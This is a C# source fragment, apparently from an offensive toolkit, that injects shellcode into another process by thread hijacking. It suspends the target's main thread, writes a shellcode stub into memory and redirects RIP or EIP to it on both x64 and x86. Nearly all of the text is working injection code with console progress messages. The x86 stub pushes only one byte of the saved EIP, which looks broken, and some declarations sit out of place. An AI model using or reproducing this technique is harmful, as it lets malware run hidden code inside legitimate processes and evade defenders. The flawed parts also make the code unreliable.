////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
private Boolean GetContext32()
{
context32 = new Winnt.CONTEXT()
{
ContextFlags = Winnt.CONTEXT_FLAGS.CONTEXT_FULL
};
try
{
Console.WriteLine("[*] Getting Thread Context");
kernel32.IsWow64Process(lpProcessInformation.hProcess, out Boolean isWow64);
if (isWow64)
{
kernel32.Wow64GetThreadContext(lpProcessInformation.hThread, ref context32);
}
else
{
kernel32.GetThreadContext(lpProcessInformation.hThread, ref context32);
}
}
catch (Exception)
{
Console.WriteLine("[-] GetThreadContext (32) Failed");
}
Console.WriteLine("[*] EAX Address: 0x{0}", context32.Eax.ToString("X4"));
Console.WriteLine("[*] EBX Address: 0x{0}", context32.Ebx.ToString("X4"));
return(true);
}
public static extern bool Wow64GetThreadContext(IntPtr hThread, ref Winnt.CONTEXT lpContext);
public static extern Boolean Wow64SetThreadContext(IntPtr hThread, ref Winnt.CONTEXT lpContext);
////////////////////////////////////////////////////////////////////////////////
// Main Execution Function
////////////////////////////////////////////////////////////////////////////////
internal void Execute()
{
if (Process.GetCurrentProcess().Id == processId)
{
return;
}
hProcess = kernel32.OpenProcess(ProcessThreadsApi.ProcessSecurityRights.PROCESS_VM_OPERATION
| ProcessThreadsApi.ProcessSecurityRights.PROCESS_VM_WRITE
| ProcessThreadsApi.ProcessSecurityRights.PROCESS_QUERY_INFORMATION, false, processId);
if (IntPtr.Zero == hProcess)
{
Console.WriteLine("[-] OpenProcess Failed");
return;
}
Console.WriteLine("[+] Recieved Process Handle: 0x{0}", hProcess.ToString("X4"));
Int32 threadId = Process.GetProcessById((int)processId).Threads[0].Id;
Console.WriteLine("[+] Main Thread ID: {0}", threadId);
hThread = kernel32.OpenThread(
ProcessThreadsApi.ThreadSecurityRights.THREAD_GET_CONTEXT |
ProcessThreadsApi.ThreadSecurityRights.THREAD_SET_CONTEXT |
ProcessThreadsApi.ThreadSecurityRights.THREAD_SUSPEND_RESUME,
false,
(UInt32)threadId);
Console.WriteLine("[+] Recieved Thread Handle: 0x{0}", hThread.ToString("X4"));
if (-1 == kernel32.SuspendThread(hThread))
{
Console.WriteLine("[-] SuspendThread Failed");
return;
}
Console.WriteLine("[*] Suspended Thread");
////////////////////////////////////////////////////////////////////////////////
// x64 Target Process
////////////////////////////////////////////////////////////////////////////////
if (Misc.Is64BitProcess(hProcess))
{
Winnt.CONTEXT64 context = new Winnt.CONTEXT64();
context.ContextFlags = Winnt.CONTEXT_FLAGS64.CONTEXT_FULL;
if (!kernel32.GetThreadContext(hThread, ref context))
{
Console.WriteLine("[-] GetThreadContext (64) Failed");
return;
}
Console.WriteLine("[*] Retrieving Thread Context");
Console.WriteLine("[*] Original RIP: 0x{0}", context.Rip.ToString("X4"));
System.Collections.Generic.IEnumerable <Byte> stub = new Byte[] { };
stub = stub.Concat(shellcode);
stub = stub.Concat(new Byte[] { 0x48, 0xb8 }); // MOV RAX...
stub = stub.Concat(BitConverter.GetBytes(context.Rip)); // ...RIP
stub = stub.Concat(new Byte[] { 0xff, 0xe0 }); // JMP RAX
context.Rip = (UInt64)AllocateAndWriteMemory(stub.ToArray());
Console.WriteLine("[+] Updated RIP: 0x{0}", context.Rip.ToString("X4"));
if (!kernel32.SetThreadContext(hThread, ref context))
{
Console.WriteLine("[-] SetThreadContext (64) Failed");
return;
}
if (!kernel32.GetThreadContext(hThread, ref context))
{
Console.WriteLine("[-] GetThreadContext(2) (32) Failed");
return;
}
Console.WriteLine("[*] Checking RIP: 0x{0}", context.Rip.ToString("X4"));
}
////////////////////////////////////////////////////////////////////////////////
// x86 Target Process
////////////////////////////////////////////////////////////////////////////////
else
{
Winnt.CONTEXT context = new Winnt.CONTEXT();
context.ContextFlags = Winnt.CONTEXT_FLAGS.CONTEXT_ALL;
if (!kernel32.Wow64GetThreadContext(hThread, ref context))
{
Console.WriteLine("[-] GetThreadContext (32) Failed");
return;
}
Console.WriteLine("[*] Retrieving Thread Context");
Console.WriteLine("[*] Original EIP: 0x{0}", context.Eip.ToString("X4"));
System.Collections.Generic.IEnumerable <Byte> stub = new Byte[] { };
stub = stub.Concat(new Byte[] { 0x68 }); // PUSH...
stub = stub.Concat(new Byte[] { BitConverter.GetBytes(context.Eip)[0] }); // ...EIP
stub = stub.Concat(new Byte[] { 0x60, 0x9C }); // PUSHAD PUSHFD
stub = stub.Concat(shellcode);
stub = stub.Concat(new Byte[] { 0x9D, 0x61, 0xC3 }); // POPFD POPAD RET
context.Eip = (UInt32)AllocateAndWriteMemory(stub.ToArray());
Console.WriteLine("[+] Updated EIP: 0x{0}", context.Eip.ToString("X4"));
if (!kernel32.Wow64SetThreadContext(hThread, ref context))
{
Console.WriteLine("[-] SetThreadContext (32) Failed");
return;
}
Console.WriteLine("[+] Updated Thread Context");
if (!kernel32.Wow64GetThreadContext(hThread, ref context))
{
Console.WriteLine("[-] GetThreadContext(2) (32) Failed");
return;
}
Console.WriteLine("[*] Checking EIP: 0x{0}", context.Eip.ToString("X4"));
}
Console.WriteLine("[*] Resuming Thread");
}
